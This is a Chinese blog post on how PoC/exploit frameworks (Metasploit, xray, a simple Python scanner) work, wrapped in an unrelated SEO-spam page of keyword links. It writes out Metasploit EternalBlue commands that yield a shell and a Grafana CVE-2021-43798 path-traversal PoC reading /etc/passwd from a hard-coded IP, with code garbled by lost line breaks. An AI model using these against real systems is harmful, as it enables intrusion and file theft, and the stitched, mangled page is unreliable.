当前位置: 首页 > news >正文

厦门茶叶公司 网站建设营销传播服务

厦门茶叶公司 网站建设,营销传播服务,html设置网页背景图片代码,互联网做视频网站需要许可证吗文章目录前言一、基础认知二、批量POC/EXP的构想三、poc检测框架的简单实现四、xray五、Meatsploit框架参考前言 Metasploit 一款渗透测试框架漏洞利用的集合与构建和定制满足你的需求的基础漏洞利用和验证的工具 这几个说法都是百度或者官方文档中出现的手法,说…

文章目录

  • 前言
  • 一、基础认知
  • 二、批量POC/EXP的构想
  • 三、poc检测框架的简单实现
  • 四、xray
  • 五、Meatsploit框架
  • 参考


前言

Metasploit

  • 一款渗透测试框架
  • 漏洞利用的集合与构建和定制满足你的需求的基础
  • 漏洞利用和验证的工具

这几个说法都是百度或者官方文档中出现的手法,说到底无非就是一个软件,一堆代码。至于称之为框架(framework),就是这堆代码是帮你写好大部分的、通用的代码。封装了许多漏洞利用与验证功能,并提供了许多接口供我们调用,以定制我们想要的功能。用面向对象(OOP)的角度来说就是,写好了一个基类/接口,我们按照结构继承/实现其中的方法即可。
卖课用得最多的(影响很大)的漏洞——MS17-010,这个百度一下就有一大堆用MFS怎么拿shell的

search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 目标ip`
run
shell

一顿操作,就轻而易举地拿到一个shell。总是很疑惑,use payloads 发生了什么,payloads到底是什么样的,run之后发生了什么?
现在,我们将尝试解答这些问题


一、基础认知

不管怎么花里胡哨,漏洞利用都是通过网络通信的,通过协议栈软件/网络子系统进行信息的交换。信息的交互都是通过各种协议进行,无非就是A主机发一串特定格式的消息(01001010101),B主机接收后解析识别这个格式的01001010101,然后按照协议的规定进行下一步。
以HTTP协议为例,这是一个基于文本的应用协议,以下是一个典型的请求数据包:

GET / HTTP/1.1
Host: baidu.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.78
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: BIDUPSID=704FDAD384C9E21E8616425F299CEC24; PSTM=1620123768; 
Connection: close

HTTP服务器(Web服务器)接收到这个段文本消息后,按照一定格式回复一个HTML文件,浏览器解析渲染,就可以看到百度的页面了。
这些都是通过协议栈提供给我们的编程接口实现的——socket API。其他应用层协议都是通过socket编程实现的,协议间的差异无非就是消息格式、加密方式、执行的操作等。

二、批量POC/EXP的构想

我们来看一个很辣鸡的POC(CVE-2021-43798)

import requestsurl = "http://8.210.89.154:3000/"
header = {
}
module_list = ["alertlist","annolist","barchart",#这里省略很多个插件名   
]file_to_read = "/etc/passwd"for plugin in module_list:poc_url = url + "public/plugins/" + plugin + '/../../../../../../../../../../../../..' + file_to_readprint(poc_url)res = requests.get(url=url, headers=header)print(res.status_code)print("*****************************************************")if "root" in res.text:print("漏洞存在")break

这个POC做的事:

  1. 构造一个含有payload的url(这里就是这个漏洞的漏洞利用方式)
  2. 发送http数据包(requests模块已经榜我们构造好数据包并发送出去)
  3. 获取回包并做判断

所有的POC都是这样:

  • 构造含有payload的数据包(各种协议)
  • 根据可用的条件判断漏洞

那么我们要做就是2点,其他东西几乎都是一样的,那么我们就可写一个软件,用户提供这2点逻辑代码,让软件自动帮我们构造数据包并调用执行,那么,我们就可以实现批量的poc检测。野心再大一点,我们要实现更多功能,那么,一个漏洞扫描器就诞生了。


三、poc检测框架的简单实现

由于我们我们辣鸡的代码水平,我们并不能做很复杂的事情,我们的构想是这样:

  • 以poc文件为单位
  • 规定每个poc文件中实现verify()函数
  • 遍历poc,调用verify()函数

项目结构:
在这里插入图片描述
main.py如下:

import os
import sys
import importlib
import warnings
warnings.filterwarnings("ignore")  #去除warnings
def banner():msg = r'''--\ \               ||-----------         ||-----------    -----||----\ \  //      -----||----
---------------- ||---||----||
---------------- ||---||----||---//---        //|| \\--//---        // ||  \\//               ||'''print(msg)
banner()
sys.path.append("pocs")  #临时添加搜索模块时的路径
path = "./pocs"
list = []
datanames = os.listdir(path)  #获取path目录下所有的POC文件名,存在列表datanames
datanames.remove('__init__.py')  # 去除非poc文件
datanames.remove('__pycache__')  # 去除非poc文件
for i in datanames:     a = i[:-3]			#去除文件后缀 .pyi = importlib.import_module(a)  #将字符串作为模块导入list.append(i)					#模块名存入list[]
for i in list:res = i.verify(sys[1])	#传入url,调用每个模块的verify()方法print(res)

poc文件如下:

import requests
def verify(arg, **kwargs):r = requests.get(arg)if r.status_code == 200:return {"url": arg, "text": r.text}

命令运行:
在这里插入图片描述

这代码辣鸡得不能在辣鸡了,但也勉强实现了我们得需求,批量poc对一个url进行检测。经过了辣鸡人生体验,我们来看看现代化的、时尚的、智能的poc检测框架

四、xray

xray的检测的伪代码:

for rule in rules:newReq = mutate_request_by_rule(req, rule)response = send(newReq)if not check_response(response, rule):break

简单来讲就是将请求根据 rule 中的规则对请求变形,然后获取变形后的响应,再检查响应是否匹配 expression 部分的表达式。如果匹配,就进行下一个 rule,如果不匹配则退出执行。 如果成功执行完了最后一个 rule,那么代表目标有漏洞,将 detail 中的信息附加到漏洞输出后就完成了单个 poc 的整个流程。

不管怎么变,核心思想都是:

  • 请求数据包变形
  • 根据回包逻辑判断

五、Meatsploit框架

讲了这么多,到底讲了什么呢?我们再来看一下MS7-010的利用过程:

search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 目标ip`
run
shell

无非就是

  1. 关键字搜索
  2. 加载人家写好的exp(有些还要设置payload
  3. 设置exp需要的参数
  4. run --> 发送该数据包进行攻击

如果你感兴趣,可以自己去看一下这个exploit/windows/smb/ms17_010_eternalblueruby文件
本质还是需要懂得漏洞本身,永恒之蓝这种系统漏洞又涉及SMB协议、二进制、缓冲区溢出等知识,所以说Metasploit是一个框架,允许你基于这个框架写poc、exp,并进行攻击利用。你完全可以写一个独立的工具,不过,正如我们实现的辣鸡poc,一键扫描还是香的。而且之前我们说过,很多代码都是重复的,框架可以简化我们写poc的过程,这也是yaml格式的poc的由来原因

参考

https://paper.seebug.org/913/
https://pocsuite.org/guide/what-is-pocsuite3.html
https://www.offensive-security.com/metasploit-unleashed/exploit-format/
《Web渗透测试 基于Metasploit5.0》
https://docs.xray.cool/#/tutorial/introduce

http://www.yidumall.com/news/69430.html

相关文章:

  • h5网站源代码关键词密度
  • wordpress目录权限设置密码搜索引擎优化是什么意思
  • 个人名义做网站武汉网站设计十年乐云seo
  • 网站开发需求 模板seo排名哪家公司好
  • WordPress微博qq登录插件优化营商环境评价
  • 网站做响应式还是移动端线上营销推广的公司
  • 简单的网站设计怎么做给大家科普一下b站推广网站
  • 营销网站中最重要的部分是爱营销电信版下载app最新版
  • 昆明优化网站百度推广开户流程
  • 网站经营性备案多少钱赛事资讯赛马资料
  • 鞍山做网站比较好的公司今天最新军事新闻视频
  • 小白怎么做跨境电商seo技术优化服务
  • 网站建设建站seo排名培训公司
  • 徐州智能模板建站热点新闻事件今日最新
  • 在北京注册公司有什么好处北京网站优化常识
  • 在线拼接图片关键词优化收费标准
  • 松江做网站价格市场营销策划ppt
  • 网站搜索怎么做的合肥做网站公司哪家好
  • 泰州做企业网站网站改版
  • 房地产开发网站建设app开发公司推荐
  • 做古建的那些网站比较适合官方百度app下载
  • 网站开发用什么好网址和网站的区别
  • 深圳积分商城网站建设怎么查询百度收录情况
  • 专业网站制作需要多少钱郑州seo多少钱
  • 太原做网站的工作室seo海外
  • 免费中英文网站模板设计好看的网站
  • 网站建设与网页设计制作绿皮书重庆seo关键词优化服务
  • 网站怎么做伪静态百度信息流推广技巧
  • 偃师市住房和城乡建设局网站长沙本地推广平台
  • centos做网站seo怎么优化关键词排名